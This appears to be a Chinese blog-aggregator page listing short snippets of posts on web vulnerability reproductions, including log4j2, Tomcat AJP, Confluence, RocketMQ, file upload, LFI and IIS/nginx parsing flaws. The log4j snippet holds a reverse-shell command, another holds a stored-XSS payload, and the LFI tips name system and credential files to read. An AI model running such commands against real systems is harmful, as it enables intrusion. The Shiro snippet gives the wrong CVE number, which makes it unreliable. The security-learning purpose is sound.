漏洞ay
Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938)
### Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938)【项目中遇到过】 **1. 背景简述** java是目前WEB开发中主流的编程语言,而Tomcat是当前流行的Java中间件服务器之一。 Ghostcat(幽灵猫)是由长亭科技安全研究员发现的存在于 Tomcat ......
ActiveMQ任意文件写入漏洞(CVE-2016-3088)
### ActiveMQ任意文件写入漏洞(CVE-2016-3088)【现实项目遇到过】 **1. 环境搭建** ```sh cd vulhub-master/activemq/CVE-2016-3088 docker-compose up -d docker-compose config #查看靶 ......
Nexpose v6.6.209 for Linux & Windows - 漏洞扫描
Nexpose v6.6.209 for Linux & Windows - 漏洞扫描 Rapid7 Vulnerability Management, Release Aug 02, 2023 请访问原文链接:,查看最新版。原创作品,转载请保留出处。 作者主页:[sysin.org](https: ......
CVE-2021-44228 Apache log4j2远程代码执行漏洞
漏洞复现 验证是否存在apache log4j2漏洞 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 反弹shell bash -i >& /dev/tcp/ip/port 0>&1 将此命令进行javarunti ......
Confluence OGNL表达式注入命令执行漏洞(CVE-2022-26134)
# Confluence OGNL表达式注入命令执行漏洞(CVE-2022-26134) ## 简介 Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新,通告了一个严重且已在野利用的代码执行漏洞,攻击者利用这个漏洞即可无需 ......
web渗透测试(14):文件上传漏洞
在本节中,我们将介绍如何使用文件上载功能来获取代码。 在Web应用程序(尤其是使用文件系统来确定应运行哪些代码的应用程序)中,如果您设法上传具有正确文件名的文件(通常取决于扩展名),则可以在服务器上执行代码。在本节中,我们将看到这些类型的攻击的基础知识。 首先,由于我们正在开发一个PHP应用程序,我 ......
HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞)
# HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞) @[TOC](目录标题) ### 漏洞概述 ### http.sys介绍 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务 ......
fastjson 1.2.80 漏洞浅析及利用payload
# 0x01 说明 在fastjson的1.2.80版本中可以通过将依赖加入到java.lang.Exception 期望类的子类中,绕过checkAuto。 # 0x02 简析 ``` { "@type":"java.lang.Exception", "@type":"org.codehaus.g ......
CentOS7/8 升级openssl版本至3.0.8 修补漏洞SWEET32
升级步骤 1.安装perl-CPAN模块yum install perl-IPC-Cmd2.下载openssl源代码wget --no-check-certificate https://www.openssl.org/source/openssl-3.0.8.tar.gz tar -zxvf op ......
Apache RocketMQ 远程代码执行漏洞(CVE-2023-33246)
RocketMQ 5.1.0及以下版本,在一定条件下,存在远程命令执行风险。RocketMQ的NameServer、Broker、Controller等多个组件外网泄露,缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。 此外,攻击者可以通过伪造 Roc... ......
WEB漏洞—XXE&XML之利用检测绕过全解
一.基础概念 1.XML XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞, ......
文件上传漏洞
文件上传漏洞 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者 WebShell 等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。 文件上传漏洞本身就是一个危害巨大的漏洞,WebShel ......
本地文件包含漏洞利用注意事项
## 本地文件包含漏洞利用注意事项 1. 当怀疑某个URL中的参数有LFI漏洞时,可以用/etc/passwd, /var/log/auth.log, /var/log/apache2/access.log,等进行测试,如果已知靶机有其他服务,比如邮件,那么可能还需要测试/var/mail/用户名 ......
ueditor编辑器存储型XSS漏洞
挖洞经验|UEditor编辑器存储型XSS漏洞 - FreeBuf网络安全行业门户 1、介绍 2、测试 2.1 靶场搭建 2.2 测试 burp拦截,篡改设置payload %3Cp%3E1111111"><ImG sRc=1 OnErRoR=prompt(1)>%3Cbr%2F%3E%3C%2Fp ......
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
# OpenSSH 资源管理错误漏洞(CVE-2021-28041) 漏洞描述: OpenSSH(OpenBSD Secure Shell)是Openbsd计划组的一套用于安全访问远程计算机的连接工具。 该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他 网络级 ......
Apache RocketMQ 远程代码执行漏洞(CVE-2023-37582)
Apache RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。CVE-2023-37582 中,由于对 CVE-2023-33246 修复不完善,导致在Apache RocketMQ NameServer 存在未授权访问的情况下,攻击者可构造恶意请求以RocketMQ运行的系... ......
Apache Shrio反序列化漏洞
Apache Shiro是一个流行的Java安全框架,然而,它存在一个反序列化漏洞,即CVE-2017-5638。该漏洞允许攻击者通过构造恶意序列化数据,利用Shiro的序列化功能来执行任意代码,从而攻击Java应用程序的安全边界。 以下是Apache Shrio反序列化漏洞的介绍及复现过程: 漏洞 ......
log4j JNDI注入漏洞
log4j漏洞复现及详细分析 - FreeBuf网络安全行业门户 Vulhub - Docker-Compose file for vulnerability environment 1、介绍 名称:log4j JNDI注入漏洞 编号:CVE-2021-44228 原理: 应用:log4j 版本: ......
Windows五次Shift漏洞
# Windows五次Shift漏洞 标签(空格分隔): 网络攻防技术 ###实验原理 当我们使用计算机时,连续按下5次shift键会弹出一个程序。该程序名称为“sethc.exe”,其路径为“c:\windows\system32\sethc.exe”。 原理 : 该系统漏洞由于部分Win7及Wi ......
Windows漏洞CVE-2019-0708
# Windows漏洞CVE-2019-0708 标签(空格分隔): 网络攻防技术 ###1.python-exp攻击 步骤 : (1)**开启Windows7的远程桌面服务**:在windows7系统中依次选择【控制面板】→【系统和安全】→【允许远程访问】打开远程访问服务。 (2)**下载漏洞利用 ......
Golang漏洞管理
原文在[这里](https://go.dev/security/vuln/) ## 概述 Go帮助开发人员检测、评估和解决可能被攻击者利用的错误或弱点。在幕后,Go团队运行一个管道来整理关于漏洞的报告,这些报告存储在Go漏洞数据库中。各种库和工具可以读取和分析这些报告,以了解特定用户项目可能受到的影 ......
log4j反序列化漏洞
Vulhub - Docker-Compose file for vulnerability environment 1、介绍 名称:nginx解析漏洞 编号: 原理: 应用:log4j 版本: 2、测试 2.1 靶场搭建 2.2 ysoserial: JAVA反序列化POC生成工具 (gitee. ......
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
Vulhub - Docker-Compose file for vulnerability environment 1、介绍 名称:Apache HTTPD 换行解析漏洞 编号:CVE-2017-15715 原理:Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网 ......
iis解析漏洞
1、介绍 名称:iis解析漏洞 编号: 原理:IIS 6.0 在处理含有特殊符号的文件路径时会出现逻辑错误,从而造成文件解析漏洞。这一漏洞有两种完全不同的利用方式: /test.asp/test.jpg test.asp;.jpg 应用:iis 版本: 2、测试 第一种是新建一个名为 "test.a ......
iis put漏洞
Web中间件漏洞之IIS篇 - FreeBuf网络安全行业门户 1、介绍 名称:nginx解析漏洞 编号: 原理:IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,造成任意文件上传。 应用:iis 版本:IIS 6.0 2、测试 options测试put方法是 ......
WEB漏洞—反序列化之php&java(上)
PHP 反序列化原理: 未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL 注入,目录遍历等不可控后果。 其实跟文件解析差不多,都是由于传递的恶意参数被执行(序列化和反序列化相当于加解密过程) 在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就 ......
Nexpose v6.6.208 for Linux & Windows - 漏洞扫描
Nexpose v6.6.208 for Linux & Windows - 漏洞扫描 Rapid7 Vulnerability Management, Release Jul 27, 2023 请访问原文链接:,查看最新版。原创作品,转载请保留出处。 作者主页:[sysin.org](https: ......
nginx解析漏洞
1、介绍 名称:nginx解析漏洞 编号: 原理: 应用:nginx、php 版本:该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。 2、测试 2.1 环境搭建 2.2 添加/.php后缀,响应可知解析为php执行 2.3 制作图片马 (1)准备一个a.jpg文件,和一个b.ph ......
nginx配置错误导致漏洞
Vulhub - Docker-Compose file for vulnerability environment 1、介绍 三种基于配置错误而发生的漏洞,CRLF注入漏洞,目录穿越漏洞,add_header被覆盖 靶场搭建,8080/8081/8082三个端口,分别对应三种漏洞。 2、CRLF漏 ......